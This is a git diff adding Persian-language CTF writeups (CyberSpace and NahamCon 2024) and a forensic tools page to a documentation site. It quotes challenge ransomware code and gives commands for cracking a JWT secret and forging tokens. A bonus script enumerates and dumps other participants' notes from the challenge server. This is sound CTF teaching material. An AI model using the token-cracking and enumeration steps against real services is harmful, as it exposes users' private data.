diff --git a/docs/forensic/Tools/index.md b/docs/forensic/Tools/index.md
new file mode 100644
index 000000000..58b03f4af
--- /dev/null
+++ b/docs/forensic/Tools/index.md
@@ -0,0 +1,35 @@
+# ابزار فارنزیک
+
+اگه میخواین چلنج های فارنزیک رو تار و مار کنید، این ابزار رو همیشه نصب داشته باشید😁
+
+## [Volatility3](https://github.com/volatilityfoundation/volatility3)
+هرجایی که صحبت از مموری دامپ و سیستم hibernate شده و coredump به میون بیاد، میریم سراغ volatility
+
+این ابزار به کمک ماژول های متعددی که براش نوشتن میاد و انواع دامپ ها رو برای ما بررسی میکنه و اطلاعات خیلی مهمی از قبیل پروسس های در حال اجرا، لیست فایل های موجود در سیستم و استخراج فایل (در صورت ایندکس شدن در مموری) رو بهمون میده
+
+این ماژول ها فقط یه قسمت خیلی کوچیکی از کل کارایی volatility هستن
+
+این ابزار برای مموری دامپ های هر ۳ سیستم عامل (ویندوز، لینوکس و مک) به خوبی کار میکنه
+
+دو نسخه از این ابزار وجود داره که امروزه هر دو اون ها تو چلنج ها مورد استفاده قرار میگیرن
+
+یک نسخه برای [پایتون 2](https://github.com/volatilityfoundation/volatility) و یک نسخه برای [پایتون 3](https://github.com/volatilityfoundation/volatility3)
+
+## [samdump](https://github.com/h4ms1k/samdump)
+احتمالا میدونید که تو ویندوز، فایل هایی که وظیفه نگهداری پسورد یوزر ها رو دارن، تو این مسیرن
+```
+C:\Windows\System32\config\SAM\
+```
+تو این مسیر، دو تا فایل مهم وجود داره: SAM و SYSTEM
+که این ابزار دقیقا برای این دو تا فایل ساخته شده و به وسیله این دو تا فایل، میاد یوزرنیم و هش مورد نیاز برای کرک رو درمیاره
+
+## [evtx_parser](https://github.com/omerbenamram/evtx)
+بعیده CTF این برگزار بشه و فایل لاگ ویندوز ندن =)))
+
+این یه ابزار سریع و قوی برای parse کردن لاگ های evtx ویندوزه که از سیر تا پیازشون رو خورد میکنه و تحویل میده😁
+
+## [wireshark](https://www.wireshark.org/)
+فایل pcap دادن بهتون؟
+بندازینش تو وایرشارک
+این ابزار، همه نوع فیلتری که بخواین رو داره
+البته نسخه کامند لاینیش هم هست ولی خو نیازه یکم با خود وایرشارک فیلترنویسی رو یاد بگیرین تا بتونین از [cli](https://www.wireshark.org/docs/man-pages/tshark.html) اش استفاده کنین
\ No newline at end of file
diff --git a/docs/forensic/writeups/2024/CyberSpace/3d-obj-1.png b/docs/forensic/writeups/2024/CyberSpace/3d-obj-1.png
new file mode 100644
index 000000000..2f478042c
Binary files /dev/null and b/docs/forensic/writeups/2024/CyberSpace/3d-obj-1.png differ
diff --git a/docs/forensic/writeups/2024/CyberSpace/3d-obj-2.png b/docs/forensic/writeups/2024/CyberSpace/3d-obj-2.png
new file mode 100644
index 000000000..245e9fe09
Binary files /dev/null and b/docs/forensic/writeups/2024/CyberSpace/3d-obj-2.png differ
diff --git a/docs/forensic/writeups/2024/CyberSpace/3d-obj.md b/docs/forensic/writeups/2024/CyberSpace/3d-obj.md
new file mode 100644
index 000000000..07a2202b8
--- /dev/null
+++ b/docs/forensic/writeups/2024/CyberSpace/3d-obj.md
@@ -0,0 +1,24 @@
+---
+tags:
+ - CyberSpace
+ - CyberSpace-2024
+ - Forensics
+ - 3D
+---
+
+تو نگاه اول با ۳ تا فایل مواجه میشیم
+
+
+
+با کمی سرچ و دقت به تایتل سوال میفهمیم که این ۳ تا فایل برای مدل های ۳ بعدی استفاده میشن
+
+پس یه سایت آنلاین برای نمایش مدل ۳ بعدی پیدا میکنیم
+
+بعد از نیم ساعت سر و کله زدن با مکعب، درمیابیم که با کمی zoom out کردن فلگ ظاهر میشه
+
+
+
+---
+!!! نویسنده
+ [SafaSafari](https://twitter.com/SafaSafari3)
+
diff --git a/docs/forensic/writeups/2024/CyberSpace/social-distancing-1.png b/docs/forensic/writeups/2024/CyberSpace/social-distancing-1.png
new file mode 100644
index 000000000..e7a87134a
Binary files /dev/null and b/docs/forensic/writeups/2024/CyberSpace/social-distancing-1.png differ
diff --git a/docs/forensic/writeups/2024/CyberSpace/social-distancing-2.png b/docs/forensic/writeups/2024/CyberSpace/social-distancing-2.png
new file mode 100644
index 000000000..81e799091
Binary files /dev/null and b/docs/forensic/writeups/2024/CyberSpace/social-distancing-2.png differ
diff --git a/docs/forensic/writeups/2024/CyberSpace/social-distancing-3.png b/docs/forensic/writeups/2024/CyberSpace/social-distancing-3.png
new file mode 100644
index 000000000..8470a68eb
Binary files /dev/null and b/docs/forensic/writeups/2024/CyberSpace/social-distancing-3.png differ
diff --git a/docs/forensic/writeups/2024/CyberSpace/social-distancing-4.png b/docs/forensic/writeups/2024/CyberSpace/social-distancing-4.png
new file mode 100644
index 000000000..5a3b51ce9
Binary files /dev/null and b/docs/forensic/writeups/2024/CyberSpace/social-distancing-4.png differ
diff --git a/docs/forensic/writeups/2024/CyberSpace/social-distancing.md b/docs/forensic/writeups/2024/CyberSpace/social-distancing.md
new file mode 100644
index 000000000..e0595bb2d
--- /dev/null
+++ b/docs/forensic/writeups/2024/CyberSpace/social-distancing.md
@@ -0,0 +1,37 @@
+---
+tags:
+ - CyberSpace
+ - CyberSpace-2024
+ - Forensics
+ - Defender
+ - Quarantine
+---
+
+بعد از unzip کردن فایل با این فولدر ها مواجه میشیم
+
+
+
+با یه سرچ ساده در گوگل و دیدن اسم فولدر اصلی به این پی میبریم که این مربوط به طرز ذخیره سازی فایل های قرنطینه تو ویندوز دیفندر مایکروسافت هست
+
+پس میگردیم دنبال ابزار دکریپت این فایل ها و با این سورس مواجه میشیم
+
+[windows_defender_unquarantine.py](https://gist.github.com/OALabs/30346d78a1fccf59d6bfafab42fbee5e)
+
+بعد از اجرای موفق اسکریپت با python2
+
+
+
+و بعد از دیکد کردن بیس ۶۴ با فایل zip مواجه میشیم که حتی نیازی با unzip کردنش نداریم و فلگ رو دودستی بهمون تقدیم میکنه =))
+
+
+
+البته میتونستیم از سایبرشف هم برای دکریپت کردن استفاده کنیم
+
+
+
+??? success "FLAG :triangular_flag_on_post:"
+
`CSCTF{y0u_un-qu4rant1n3d_my_scr1Pt!_0x91a3edff6}`
+---
+!!! نویسنده
+ [SafaSafari](https://twitter.com/SafaSafari3)
+
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence-1.png b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-1.png
new file mode 100644
index 000000000..678dcaac5
Binary files /dev/null and b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-1.png differ
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence-2.png b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-2.png
new file mode 100644
index 000000000..976c0ef14
Binary files /dev/null and b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-2.png differ
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence-3.png b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-3.png
new file mode 100644
index 000000000..f3a3e6dad
Binary files /dev/null and b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-3.png differ
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence-4.png b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-4.png
new file mode 100644
index 000000000..6f32e8379
Binary files /dev/null and b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-4.png differ
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence-5.png b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-5.png
new file mode 100644
index 000000000..35ed690ac
Binary files /dev/null and b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-5.png differ
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence-6.png b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-6.png
new file mode 100644
index 000000000..99210e270
Binary files /dev/null and b/docs/forensic/writeups/2024/NahamCon/taking-up-residence-6.png differ
diff --git a/docs/forensic/writeups/2024/NahamCon/taking-up-residence.md b/docs/forensic/writeups/2024/NahamCon/taking-up-residence.md
new file mode 100644
index 000000000..992ad09e2
--- /dev/null
+++ b/docs/forensic/writeups/2024/NahamCon/taking-up-residence.md
@@ -0,0 +1,70 @@
+---
+tags:
+ - NahamCon
+ - NahamCon-2024
+ - Forensics
+ - AD1
+ - MFT
+---
+
+
+
+با یه فایل بدون پسوند روبرو ایم =))
+
+خبر بد این که حتی file هم تشخیص نمیده این چه کوفتیه 😂
+
+
+
+خوب، راهی نداریم جز این که بریم سراغ hex editor
+
+
+
+بعد از گشتن دنبال کلمه کلیدی flag.txt میبینیم که این اسم تو یه فایل پایتونی استفاده شده
+
+```python
+from cryptography.fernet import Fernet
+import subprocess
+
+key = subprocess.run(["powershell", "-EncodedCommand", "RwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgByAGEAbgBzAG8AbQAuAHAAeQAiACAALQBTAHQAcgBlAGEAbQAgACIAawBlAHkAIgA="], capture_output=True, text=True).stdout.strip()
+
+print(key)
+with open('flag.txt', 'r') as reader:
+ message = reader.read()
+f = Fernet(key)
+
+encrypted_message = f.encrypt(message.encode())
+print(encrypted_message)
+with open('flag.txt', 'w') as writer:
+ writer.write(encrypted_message.decode('ascii'))
+```
+
+با دیکد کردن کامند لاینی که وارد پاورشل شده، به همچین دستوری میرسیم
+
+```Get-Content -Path "ransom.py" -Stream "key"```
+
+که به پاورشل میگه بره و از تو MFT قسمت استریم key رو بخونه و ریترن کنه
+
+اگه دوباره به عکس بالا نگاه کنید، در آخر عکس، این استریم رو میبینید که این زیر میزارم
+
+```62QJTO5dH0xaKgmiVfOFKNYCBMfRiNF5L7rxDChc0SU=```
+
+الان رمز اینکریپشن Fernet رو داریم و فقط مونده خود متن انکریپت شده
+
+همه متن های cipher ای که با Fernet انکریپت شدن، با gAAAAA شروع میشن و این میتونه راهنمای خوبی باشه برای پیدا کردن فایل
+
+
+
+اما خوب یه راه اصولی تر هم هست، اونم این که کلمه flag.txt رو یه بار به بصورت utf-16 سرچ کنیم
+
+
+
+بعدش هم یه دکریپت سادس که با کمک [سایبرشف](https://gchq.github.io/CyberChef/#recipe=Fernet_Decrypt('62QJTO5dH0xaKgmiVfOFKNYCBMfRiNF5L7rxDChc0SU')&input=Z0FBQUFBQm1TOXMzMnY1SnUxODFFYUpoaDJ2WU1zUjZNSjMxU0stOW1Ed2dpQ3ozX01CV29wanFxeW5qb1lfLUhOT3czdFgxVDNSdGhCWkh6OXlsbXlxY2taMGdVWl82VDdVVXhwck1Ib0NBYVRWM20xcTB3ZXpuQmc5OFJMN2RSVmhSbjBjWDZYdGE) انجام میدیم
+
+
+
+??? success "FLAG :triangular_flag_on_post:"
+ `flag{a4096cd70d8859d38cf8e7487b4cd0fa}`
+---
+!!! نویسنده
+ [SafaSafari](https://twitter.com/SafaSafari3)
+
diff --git a/docs/reverse/writeups/2024/CyberSpace/login-1.png b/docs/reverse/writeups/2024/CyberSpace/login-1.png
new file mode 100644
index 000000000..441f44892
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/login-1.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/login-2.png b/docs/reverse/writeups/2024/CyberSpace/login-2.png
new file mode 100644
index 000000000..9971d8006
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/login-2.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/login.md b/docs/reverse/writeups/2024/CyberSpace/login.md
new file mode 100644
index 000000000..25f29e521
--- /dev/null
+++ b/docs/reverse/writeups/2024/CyberSpace/login.md
@@ -0,0 +1,42 @@
+---
+tags:
+ - CyberSpace
+ - CyberSpace-2024
+ - Reverse
+ - Android
+ - Flutter
+---
+
+این چالش ریورس اندروید با فلاتر طراحی شده
+
+فلاتر یجورایی آخرین سنگر طراح چلنجه برای این که چلنج سختی طراحی کرده باشه
+اما ما به سادگی آب خوردن حلش میکنیم =))
+
+اول از همه با نصب استفاده از این ابزار، به disassembly از فلاتر دست پیدا میکنیم که کارمون رو تا حد زیادی راحت میکنه
+[blutter](https://github.com/worawit/blutter)
+
+```bash
+python ../tools/blutter/blutter.py login/lib/arm64-v8a rev_login
+```
+
+بعد از باز کردن فایل main.dart تو پوشه asm و سر و کله زدن باهاش و خوندن جاهای مختلف به یوزرنیم و پسورد بصورت بیس ۶۴ انکد شده میرسیم
+
+
+
+```
+4dm1n
+U3VwM3JTM2NyM3RmMHJNeVMzY3VSM0wwZ2luQXBw (Sup3rS3cr3tf0rMyS3cuR3L0ginApp)
+```
+
+با وارد کردن یوزرنیم و پسورد در اپلیکیشن، فلگ رو دریافت میکنیم
+
+
+
+پ.ن: اگه براتون سوال شد که چرا فلگ رو از داخل خود سورس نخوندیم، باید بهتون بگم که میشد، اما چون فلگ از substr پسورد ساخته میشد، یکم اذیتمون میکرد و ترجیح دادیم ساده ترین روش رو برای رایتاپ بنویسیم
+
+??? success "FLAG :triangular_flag_on_post:"
+ `CSCTF{SuP3r_S3cuRe_l0g1n_1234}`
+---
+!!! نویسنده
+ [SafaSafari](https://twitter.com/SafaSafari3)
+
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-1.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-1.png
new file mode 100644
index 000000000..93925af44
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-1.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-2.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-2.png
new file mode 100644
index 000000000..10b038f76
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-2.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-3.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-3.png
new file mode 100644
index 000000000..0d23183cf
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-3.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-4.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-4.png
new file mode 100644
index 000000000..6831dfd02
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-4.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-5.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-5.png
new file mode 100644
index 000000000..48b51a5c9
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-5.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-6.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-6.png
new file mode 100644
index 000000000..920798851
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-6.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-7.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-7.png
new file mode 100644
index 000000000..d66f946ce
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-7.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-8.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-8.png
new file mode 100644
index 000000000..41ffb41db
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-8.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note-9.png b/docs/reverse/writeups/2024/CyberSpace/secure-note-9.png
new file mode 100644
index 000000000..b59141904
Binary files /dev/null and b/docs/reverse/writeups/2024/CyberSpace/secure-note-9.png differ
diff --git a/docs/reverse/writeups/2024/CyberSpace/secure-note.md b/docs/reverse/writeups/2024/CyberSpace/secure-note.md
new file mode 100644
index 000000000..8a5d1d219
--- /dev/null
+++ b/docs/reverse/writeups/2024/CyberSpace/secure-note.md
@@ -0,0 +1,162 @@
+---
+tags:
+ - CyberSpace
+ - CyberSpace-2024
+ - Reverse
+ - Android
+ - Flutter
+---
+
+اگه چلنج [login](./login.md) رو دیده باشین از ابزار [blutter](https://github.com/worawit/blutter) برای ریورس فلاتر استفاده کردیم
+
+تو این چلنج هم همین کارو میکنیم
+
+این دفعه یکم کارمون سخت تره چون چلنج سخت تری هم هست :joy:
+
+Anyway بریم سراغ چلنج
+
+ایندفعه چندین سورس داریم که نیازه اکثرشون رو چک کنیم
+
+
+
+بعد از بررسی اجمالی سورس ها به یه سری اندپوینت میرسیم
+
+https://securenotesmobile-challs.csc.tf/register
+
+https://securenotesmobile-challs.csc.tf/login
+
+https://securenotesmobile-challs.csc.tf/notes
+
+https://securenotesmobile-challs.csc.tf/create_note
+
+اگه یه درخواست ساده curl به سمتشون ارسال کنیم، میبینیم که باید متد post ارسال کنیم
+
+پس میگردیم دنبال اسم فیلد های هر اندپوینت
+
+
+
+https://securenotesmobile-challs.csc.tf/register => Content-Type: application/json; charset=UTF-8, username, password
+
+پس میشه همچین دستوری
+
+```bash
+curl https://securenotesmobile-challs.csc.tf/register -H "Content-Type: application/json; charset=UTF-8" --data-raw '{"username": "iam", "password": "SafaSafari"}' -i
+```
+
+
+
+اما صبر کنید
+
+داره ۴۰۳ میده!!
+
+یعنی فهمیده که خود برنامه درخواست نمیزنه و ما با curl بازسازیش کردیم
+
+خوب ما در اصل چندین پارامتر داریم که میتونه این رو لو بده
+
+یکی از ساده تریناش user-agent هست
+
+پس باید ببینیم برنامه چه user-agent ای ارسال میکنه سمت سرور و ما هم با همون user-agent بفرستیم
+
+یه راهی که تو بقیه رایتاپ ها اومده و من زیاد از پروژش خوشم نمیاد اینه که میان ssl pinning توی فلاتر رو با ابزار [reflutter](https://github.com/ptswarm/reFlutter) حذف میکنن و درخواست رو اسنیف میکنن
+
+اما ما میخوایم به یه روش باحال تر چلنج رو حل کنیم
+
+یه قانون نانوشته تو ریورس باینری هست اونم اینه که شما میتونید بدون تغییر دادن length استرینگ ها، اونا رو تغییر بدین
+
+من یه سایت دارم که همه درخواست هایی که بهش میاد رو ذخیره میکنم تو یه کانال تلگرامی
+
+پس میایم و این اندپوینت رو تغییر میدیم
+
+https://securenotesmobile-challs.csc.tf/register => https://i.safa.re/smobile-challs.csc.tf/register
+
+و باینری رو میزاریم سر جاش و تو موبایل برنامه رو اجرا میکنیم و تو کانال منتظر دریافت درخواست میمونیم
+
+
+
+پس یوزر ایجنت باید `Dart/3.3 (dart:io)` باشه
+
+```bash
+curl https://securenotesmobile-challs.csc.tf/register -H "Content-Type: application/json; charset=UTF-8" --data-raw '{"username": "iam", "password": "SafaSafari"}' -A "Dart/3.3 (dart:io)"
+```
+
+
+
+و بعد لاگین
+
+
+
+حالا چی؟
+
+یه jwt بهمون داده که نمیدونیم کجا لوله کنیم =))))))
+
+اگه قسمت payload رو چک کنیم با همچین چیزی مواجه میشیم
+
+```json
+{
+ "fresh": false,
+ "iat": 1725614233,
+ "jti": "4646cba7-c0ee-4f71-980b-fcaa418558ef",
+ "type": "access",
+ "sub": 261,
+ "nbf": 1725614233,
+ "csrf": "a9040a64-8d22-49bf-baa3-79d4b1803a3b",
+ "exp": 1725615133
+}
+```
+
+اون پارامتر sub منظورش همون یوزر آیدی هست
+
+حدس میزنم ادمین فلگ رو به عنوان یه نوت ذخیره کرده باشه
+
+اما ما که سکرت jwt رو نداریم
+
+چیکار کنیم؟
+
+کرک =)))
+
+```bash
+hashcat -m 16500 "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcyNTEzOTI1MywianRpIjoiZDM5M2ViZTktNTFmMy00YjRiLTk0MGMtMmI0ZTMxYzI2Yzc4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6MTE4LCJuYmYiOjE3MjUxMzkyNTMsImNzcmYiOiJjYzE0MDY2MC0zNjVjLTQxNWQtOWZmMC1kYWY1ZGI5ZTEyZTciLCJleHAiOjE3MjUxNDAxNTN9.yrhuzsNCJPcs2OdWd83lrXmaN7Ho0r8z9QHFaK226sI" /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
+```
+
+با استفاده از hashcat و این کامند، هش رو میزنیم رو کرک به امید این که سکرت اش در بیاد
+
+و در میاد =)))))
+
+
+
+پس سکرت jwt امون `789456123` هست
+
+میریم سراغ [سابیرشف](https://gchq.github.io/CyberChef/) دوست داشتنی
+
+
+
+توکنی که از سایبرشف دریافت کردیم رو میزاریم تو اندپوینتی که مربوط به لود کردن note هاس
+
+```bash
+curl https://securenotesmobile-challs.csc.tf/notes -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcyNTYxNDIzMywianRpIjoiNDY0NmNiYTctYzBlZS00ZjcxLTk4MGItZmNhYTQxODU1OGVmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6MSwibmJmIjoxNzI1NjE0MjMzLCJjc3JmIjoiYTkwNDBhNjQtOGQyMi00OWJmLWJhYTMtNzlkNGIxODAzYTNiIiwiZXhwIjoxNzI1NjE1MTMzfQ.bKPJV_aP7EO21vBnIcbmLRGQKvlbY_xNQnHqnwhbGnY" -H "User-Agent: Dart/3.3 (dart:io)"
+```
+
+
+
+??? success "FLAG :triangular_flag_on_post:"
+ `CSCTF{1_w0nd3r_1f_y0u_f0r607_7h3_u53r_463n7}`
+---
+
+bonus
+
+از اونجایی که من خیلی فضولم، یه اسکریپت نوشتم تا نوت های بقیه افراد رو هم ببینم =))))
+
+```python
+import jwt
+import requests
+
+
+for i in range(1, 262):
+ token = jwt.encode({"fresh":False,"iat":1725614233,"jti":"4646cba7-c0ee-4f71-980b-fcaa418558ef","type":"access","sub":i,"nbf":1725614233,"csrf":"a9040a64-8d22-49bf-baa3-79d4b1803a3b","exp":1825615133}, "789456123")
+ print(requests.get("https://securenotesmobile-challs.csc.tf/notes", headers={"User-Agent": "Dart/3.3 (dart:io)", "Authorization": "Bearer {}".format(token)}).json())
+```
+
+اگه براتون جالبه، یه بار رانش کردم و نتیجش رو گذاشتم [اینجا](https://pastecode.io/s/7c25azjj)
+
+!!! نویسنده
+ [SafaSafari](https://twitter.com/SafaSafari3)
\ No newline at end of file
diff --git a/mkdocs.yml b/mkdocs.yml
index 903c534a9..845bb00cb 100644
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -177,6 +177,9 @@ nav:
- معرفی ابزار:
- reverse/Tools/index.md
- رایتاپهای ۲۰۲۴:
+ - CyberSpace:
+ - reverse/writeups/2024/CyberSpace/login.md
+ - reverse/writeups/2024/CyberSpace/secure-note.md
- ImaginaryCTF: # 19 July 2024
- reverse/writeups/2024/ImaginaryCTF/unconditional.md
- reverse/writeups/2024/ImaginaryCTF/BF.md
@@ -275,9 +278,16 @@ nav:
- جرمشناسی:
- forensic/index.md
+ - معرفی ابزار:
+ - forensic/Tools/index.md
- رایتاپهای ۲۰۲۴:
+ - CyberSpace:
+ - forensic/writeups/2024/CyberSpace/3d-obj.md
+ - forensic/writeups/2024/CyberSpace/social-distancing.md
- ImaginaryCTF: # 19 July 2024
- forensic/writeups/2024/ImaginaryCTF/elves.md
+ - NahamCon:
+ - forensic/writeups/2024/NahamCon/taking-up-residence.md
- BSidesSF: # 04 May 2024
- forensic/writeups/2024/BSidesSF/doctor.md
- forensic/writeups/2024/BSidesSF/javai.md
@@ -289,8 +299,6 @@ nav:
- forensic/writeups/2024/SnappCTF/snapp-report.md
- forensic/writeups/2024/SnappCTF/false-sight.md
-
-
- PWN:
- pwn/index.md
- رایتاپهای ۲۰۲۴: